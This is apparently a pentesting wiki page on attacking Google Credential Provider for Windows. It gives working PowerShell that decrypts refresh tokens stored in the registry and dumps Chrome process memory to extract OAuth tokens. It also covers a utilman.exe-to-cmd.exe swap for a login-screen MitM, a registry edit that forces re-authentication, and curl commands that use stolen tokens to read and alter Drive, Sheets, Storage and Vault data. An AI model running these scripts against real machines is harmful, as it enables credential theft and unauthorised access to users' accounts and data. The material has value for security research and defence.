This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using their Workspace credentials. Moreover, this will store tokens to access Google Workspace in some places in the PC.
Note that Winpeas is capable to detect GCPW, get information about the configuration and even tokens.
When a user access a Windows PC synchronized with Google Workspace via GCPW it will need to complete a common login form. This login form will return an OAuth code that the PC will exchange for the refresh token in a request like:
POST /oauth2/v4/token HTTP/2Host:www.googleapis.comContent-Length:311Content-Type:application/x-www-form-urlencoded[...headers...]scope=
New lines have been added to make it more readable.
It was possible to perform a MitM by installing Proxifier in the PC, overwriting the utilman.exe binary with a cmd.exe and executing the accessibility features in the Windows login page, which will execute a CMD from which you can launch and configure the Proxifier.
Don't forget to block QUICK UDP traffic in Proxifier so it downgrades to TCP communication and you can see it.
Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows.
Moreover adding the keys enable_verbose_logging = 1 and log_file_path = C:\Public\gcpw.log in HKLM:\SOFTWARE\Google\GCPW it's possible to make it store some logs.
GCPW - Fingerprint
It's possible to check if GCPW is installed in a device checking if the following process exist or if the following registry keys exist:
# Check process gcpw_extension.exeif (Get-Process-Name "gcpw_extension"-ErrorAction SilentlyContinue) {Write-Output"The process gcpw_xtension.exe is running."} else {Write-Output"The process gcpw_xtension.exe is not running."}# Check if HKLM\SOFTWARE\Google\GCPW\Users exists$gcpwHKLMPath ="HKLM:\SOFTWARE\Google\GCPW\Users"if (Test-Path $gcpwHKLMPath) {Write-Output"GCPW is installed: The key $gcpwHKLMPath exists."} else {Write-Output"GCPW is not installed: The key $gcpwHKLMPath does not exist."}# Check if HKCU\SOFTWARE\Google\Accounts exists$gcpwHKCUPath ="HKCU:\SOFTWARE\Google\Accounts"if (Test-Path $gcpwHKCUPath) {Write-Output"Google Accounts are present: The key $gcpwHKCUPath exists."} else {Write-Output"No Google Accounts found: The key $gcpwHKCUPath does not exist."}
In HKCU:\SOFTWARE\Google\Accounts it's possible to access the email of the user and the encrypted refresh token if the user recently logged in.
In HKLM:\SOFTWARE\Google\GCPW\Users it's possible to find the domains that are allowed to login in the key domains_allowed and in subkeys it's possible to find information about the user like email, pic, user name, token lifetimes, token handle...
The token handle is a token that starts with eth. and from which can be extracted some info with a request like:
curl-s'' \-d'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg'# Example response{"audience":"","scope":"","expires_in":12880152}
Also it's possible to find the token handle of an access token with a request like:
curl-s'' \-d'access_token=<access token>'# Example response{"issued_to":"","audience":"","scope":"","expires_in":1327,"access_type":"offline","token_handle":"eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg"}
Afaik it's not possible obtain a refresh token or access token from the token handle.
Moreover, the file C:\ProgramData\Google\Credential Provider\Policies\<sid>\PolicyFetchResponse is a json containing the information of different settings like enableDmEnrollment, enableGcpAutoUpdate, enableMultiUserLogin (if several users from Workspace can login in the computer) and validityPeriodDays (number of days a user doesn't need to reauthenticate with Google directly).
GCPW - Get Tokens
GCPW - Registry Refresh Tokens
Inside the registry HKCU:\SOFTWARE\Google\Accounts it might be possible to find some accounts with the refresh_token encrypted inside. The method ProtectedData.Unprotect can easily decrypt it.
Get HKCU:\SOFTWARE\Google\Accounts data and decrypt refresh_tokens
# Import required namespace for decryptionAdd-Type-AssemblyName System.Security# Base registry path$baseKey ="HKCU:\SOFTWARE\Google\Accounts"# Function to search and decrypt refresh_token valuesfunctionGet-RegistryKeysAndDecryptTokens {param ( [string]$keyPath )# Get all values within the current key $registryKey =Get-Item-Path $keyPath $foundToken =$false# Loop through properties to find refresh_tokenforeach ($property in $registryKey.Property) {if ($property -eq"refresh_token") { $foundToken =$truetry {# Get the raw bytes of the refresh_token from the registry $encryptedTokenBytes = (Get-ItemProperty-Path $keyPath -Name $property).$property# Decrypt the bytes using ProtectedData.Unprotect $decryptedTokenBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedTokenBytes,$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) $decryptedToken = [System.Text.Encoding]::UTF8.GetString($decryptedTokenBytes)Write-Output"Path: $keyPath"Write-Output"Decrypted refresh_token: $decryptedToken"Write-Output"-----------------------------" }catch {Write-Output"Path: $keyPath"Write-Output"Failed to decrypt refresh_token: $($_.Exception.Message)"Write-Output"-----------------------------" } } }# Recursively process all subkeysGet-ChildItem-Path $keyPath |ForEach-Object {Get-RegistryKeysAndDecryptTokens-keyPath $_.PSPath }}# Start the search from the base keyGet-RegistryKeysAndDecryptTokens-keyPath $baseKey
As explained in this video, if you don't find the token in the registry it's possible to modify the value (or delete) from HKLM:\SOFTWARE\Google\GCPW\Users\<sid>\thand the next time the user access the computer he will need to login again and the token will be stored in the previous registry.
GCPW - Disk Refresh Tokens
The file %LocalAppData%\Google\Chrome\User Data\Local State stores the key to decrypt the refresh_tokens located inside the Google Chrome profiles of the user like:
%LocalAppData%\Google\Chrome\User Data\Default\Web Data
%LocalAppData%\Google\Chrome\Profile*\Default\Web Data
It's possible to find some C# code accessing these tokens in their decrypted manner in Winpeas.
It can be observed that AESGCM is used, the encrypted token starts with a version (v10 at this time), then it has 12B of nonce, and then it has the cypher-text with a final mac of 16B.
GCPW - Dumping tokens from processes memory
The following script can be used to dump every Chrome process using procdump, extract the strings and then search for strings related to access and refresh tokens. If Chrome is connected to some Google site, some process will be storing refresh and/or access tokens in memory!
Dump Chrome processes and search tokens
# Define paths for Procdump and Strings utilities $procdumpPath ="C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"$stringsPath ="C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"$dumpFolder ="C:\Users\Public\dumps"# Regular expressions for tokens $tokenRegexes =@( "ya29\.[a-zA-Z0-9_\.\-]{50,}","1//[a-zA-Z0-9_\.\-]{50,}")# Create a directory for the dumps if it doesn't exist if (!(Test-Path $dumpFolder)) { New-Item-Path $dumpFolder -ItemType Directory } # Get all Chrome process IDs $chromeProcesses =Get-Process-Name "chrome"-ErrorAction SilentlyContinue |Select-Object-ExpandProperty Id # Dump each Chrome process foreach ($processId in $chromeProcesses) { Write-Output"Dumping process with PID: $processId"& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"} # Extract strings and search for tokens in each dump Get-ChildItem $dumpFolder -Filter "*.dmp"|ForEach-Object { $dumpFile =$_.FullName $baseName =$_.BaseName $asciiStringsFile ="$dumpFolder\${baseName}_ascii_strings.txt" $unicodeStringsFile ="$dumpFolder\${baseName}_unicode_strings.txt"Write-Output"Extracting strings from $dumpFile"& $stringsPath -accepteula -n 50-nobanner $dumpFile > $asciiStringsFile & $stringsPath -accepteula -n 50-nobanner -u $dumpFile > $unicodeStringsFile $outputFiles =@($asciiStringsFile, $unicodeStringsFile) foreach ($file in $outputFiles) { foreach ($regex in $tokenRegexes) { $matches=Select-String-Path $file -Pattern $regex -AllMatches $uniqueMatches =@{} foreach ($matchInfo in$matches) { foreach ($match in $matchInfo.Matches) { $matchValue = $match.Value if (-not $uniqueMatches.ContainsKey($matchValue)) { $uniqueMatches[$matchValue] =@{ LineNumber = $matchInfo.LineNumber LineText = $matchInfo.Line.Trim() FilePath = $matchInfo.Path } } } } foreach ($matchValue in $uniqueMatches.Keys) { $info = $uniqueMatches[$matchValue] Write-Output"Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" } } Write-Output"" } } Remove-Item-Path $dumpFolder -Recurse -Force
I tried the same with gcpw_extension.exe but it didn't find any token.
For some reason, some extracted access tokens won't be valid (although some will be). I tried the following script to remove chars 1 by 1 to try to get the valid token from the dump. It never helped me to find a valid one, but it might I guess:
Check access token by removing chars 1 by 1
#!/bin/bash# Define the initial access tokenaccess_token="ya29.a0AcM612wWX6Pe3Pc6ApZYknGs5n66W1Hr1CQvF_L_pIm3uZaXWisWFabzxheYCHErRn28l2UOJuAbMzfn1TUpSKqvYvlhXJpxQsKEtwhYXzN2BZdOQNji0EXfF7po1_0WaxhwqOiE0CFQciiL8uAmkRsoXhq9ekC_S8xLrODZ2yKdDR6gSFULWaiIG-bOCFx3DkbOdbjAk-U4aN1WbglUAJdLZh7DMzSucIIZwKWvBxqqajSAjrdW0mRNVN2IfkcVLPndwj7fQJV2bQaCgYKAbQSAQ4SFQHGX2MiPuU1D-9-YHVzaFlUo_RwXA0277"# Define the URL for the requesturl=""# Loop until the token is 20 characters or the response doesn't contain "error_description"while [ ${#access_token} -gt20 ]; do# Make the request and capture the response response=$(curl-s-H"Content-Type: application/x-www-form-urlencoded"-d"access_token=$access_token" $url)# Check if the response contains "error_description"if [[ !"$response"=~"error_description" ]]; thenecho"Success: Token is valid"echo"Final token: $access_token"echo"Response: $response"exit0fi# Remove the last character from the token access_token=${access_token:0:-1}echo"Token length: ${#access_token}"doneecho"Error: Token invalid or too short"
GCPW - Generating access tokens from refresh tokens
Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the scopes supported by the application where you are generating the access token.
Alsoe, the refresh token is not valid in every application.
By default GCPW won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the refresh_token to generate an access_token:
Moreover, checking the Chromium source code it's possible to find this file, which contains other scopes that can be assumed that doesn't appear in the previously brute-forced list. Therefore, these extra scopes can be assumed:
# List buckets from a projectcurl-XGET \-H"Authorization: Bearer $access_token" \"<project-id>"# List objects in a bucketcurl-XGET \-H"Authorization: Bearer $access_token" \"<bucket-name>/o?maxResults=10&fields=items(id,name,size,updated)&orderBy=name"# Upload file to bucketcurl-XPOST \-H"Authorization: Bearer $access_token" \-H"Content-Type: application/octet-stream" \--data-binary@path/to/yourfile.ext \"<BUCKET_NAME>/o?uploadType=media&name=<OBJECT_NAME>"# Download file from bucketcurl-XGET \-H"Authorization: Bearer $access_token" \"" \-o"DownloadedFileName.ext"
# List spreadsheetscurl-XGET \-H"Authorization: Bearer $access_token" \"'application/'&fields=files(id,name,modifiedTime)&pageSize=100"# Download as pdfcurl-XGET \-H"Authorization: Bearer $access_token" \"" \-o"Spreadsheet.pdf"# Create spreadsheetcurl-XPOST \-H"Authorization: Bearer $access_token" \-H"Content-Type: application/json" \-d'{ "properties": { "title": "New Spreadsheet" } }' \""# Read data from a spreadsheetcurl-XGET \-H"Authorization: Bearer $access_token" \"<SPREADSHEET_ID>/values/Sheet1!A1:C10"# Update data in spreadsheetcurl-XPUT \-H"Authorization: Bearer $access_token" \-H"Content-Type: application/json" \-d'{ "range": "Sheet1!A2:C2", "majorDimension": "ROWS", "values": [ ["Alice Johnson", "28", ""] ] }' \"<SPREADSHEET_ID>/values/Sheet1!A2:C2?valueInputOption=USER_ENTERED"# Append datacurl-XPOST \-H"Authorization: Bearer $access_token" \-H"Content-Type: application/json" \-d'{ "values": [ ["Bob Williams", "35", ""] ] }' \"!A:C:append?valueInputOption=USER_ENTERED"
Google Workspace Vault is an add-on for Google Workspace that provides tools for data retention, search, and export for your organization's data stored in Google Workspace services like Gmail, Drive, Chat, and more.
A Matter in Google Workspace Vault is a container that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing Holds, Searches, and Exports pertaining to that particular issue.
A Hold in Google Workspace Vault is a preservation action applied to specific users or groups to prevent the deletion or alteration of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation.
# List matterscurl-XGET \-H"Authorization: Bearer $access_token" \""# Create mattercurl-XPOST \-H"Authorization: Bearer $access_token" \-H"Content-Type: application/json" \-d'{ "name": "Legal Case 2024", "description": "Matter for the upcoming legal case involving XYZ Corp.", "state": "OPEN" }' \""# Get specific mattercurl-XGET \-H"Authorization: Bearer $access_token" \"<MATTER_ID>"# List holds in a mattercurl-XGET \-H"Authorization: Bearer $access_token" \"<MATTER_ID>/holds?pageSize=10"